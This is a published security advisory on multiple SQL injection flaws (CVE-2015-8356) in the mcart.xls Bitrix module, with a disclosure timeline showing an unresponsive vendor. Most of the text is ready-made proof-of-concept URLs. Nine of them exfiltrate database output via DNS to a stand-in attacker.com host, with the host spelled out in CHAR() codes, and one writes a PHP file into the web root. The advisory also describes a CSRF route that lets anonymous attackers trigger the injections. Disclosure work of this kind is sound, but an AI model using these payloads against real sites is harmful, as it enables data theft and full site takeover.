Total Tests:

Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module

Advisory ID:HTB23279
Product:mcart.xls Bitrix module
Vendor:www.mcart.ru
Vulnerable Versions:6.5.2 and probably prior
Tested Version:6.5.2
Advisory Publication:November 18, 2015 [without technical details]
Vendor Notification:November 18, 2015
Public Disclosure:January 13, 2016
Vulnerability Type:SQL Injection [CWE-89]
CVE Reference:CVE-2015-8356
Risk Level:Medium
CVSSv2 Base Score:6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple SQL Injection vulnerabilities in mcart.xls Bitrix module, which can be exploited to execute arbitrary SQL queries and obtain potentially sensitive data, modify information in database and gain complete control over the vulnerable website.

All discovered vulnerabilities require that the attacker is authorized against the website and has access to vulnerable module. However the vulnerabilities can be also exploited via CSRF vector, since the web application does not check origin of received requests. This means, that a remote anonymous attacker can create a page with CSRF exploit, trick victim to visit this page and execute arbitrary SQL queries in database of vulnerable website.

1. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1&xls_profile= %27%20OR%201=(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version( )),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(10 1),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))+--+

2. Input passed via the "xls_profile" HTTP GET parameter to "/bitrix/admin/mcart_xls_import.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

A simple exploit below will write "<?phpinfo()?>" string into "/var/www/file.php" file:

http://[host]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SE LECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE %20%27/var/www/file.php%27%20--%202

Successful exploitation requires that the file "/var/www/file.php" is writable by MySQL system account.

3. Input passed via the "xls_iblock_id", "xls_iblock_section_id", "firstRow", "titleRow", "firstColumn", "highestColumn", "sku_iblock_id" and "xls_iblock_section_id_new" HTTP GET parameters to "/bitrix/admin/mcart_xls_import_step_2.php" script is not properly sanitised before being used in SQL query. A remote authenticated attacker can manipulate SQL queries by injecting arbitrary SQL code.

Below is a list of exploits for each vulnerable parameter. The exploits are based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):

"xls_iblock_id":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CH AR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),C HAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),C HAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)) ))%29+--+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&first Column=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ iblock_section_id_new=0
"xls_iblock_section_id"
http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0,0,(select%20load_file (CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),C HAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97), CHAR(114))))%29+--+&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highe stColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section _id_new=0

"firstRow":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0,0,0,0,0,0,0,0,0(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20v ersion()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107), CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102) ,CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&titleRow=0&firstC olumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_i block_section_id_new=0

"titleRow":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(se lect%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CH AR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),C HAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&firstColu mn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblo ck_section_id_new=0

"firstColumn":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0%27,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(9 2),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR( 97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR( 109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%2 9+--+&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ibl ock_section_id_new=0

"highestColumn":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0%27,0,0,0,0,(select%20load_file (CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),C HAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),C HAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97), CHAR(114))))%29+--+&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_ibloc k_section_id_new=0

"sku_iblock_id":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1, 0,0,0,(select%20load_file(CONCAT(CHAR(92),CHAR(92),(select%20version()),CHAR (46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR (114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHA R(111),CHAR(98),CHAR(97),CHAR(114))))%29+--+&cml2_link_code=1&xls_iblock_sec tion_id_new=0

"xls_iblock_section_id_new":

http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_t ranslit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstR ow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1& cml2_link_code=1&xls_iblock_section_id_new=0,(select%20load_file(CONCAT(CHAR (92),CHAR(92),(select%20version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHA R(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHA R(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) %29+--+

How to Detect SQL Injection Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Disclosure timeline:
2015-11-18 Vendor notified via email, no reply.
2015-12-01 Vendor notified via email, no reply.
2015-12-04 Vendor notified via contact form and email, no reply.
2015-12-11 Fix Requested via contact form and emails, no reply.
2015-12-28 Fix Requested via contact form and emails, no reply.
2016-01-11 Fix Requested via contact form and emails, no reply.
2016-01-13 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.


References:
[1] High-Tech Bridge Advisory HTB23279 - https://www.immuniweb.com/advisory/HTB23279 - Multiple SQL Injection Vulnerabilities in mcart.xls Bitrix Module
[2] mcart.xls - https://marketplace.1c-bitrix.ru/solutions/mcart.xls/ - A Bitrix module for upload and import data from Excel file.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[6] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a Technical Question?

Our security experts will answer within
one business day. No obligations.

Have a Sales Question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
*
Your data will stay private and confidential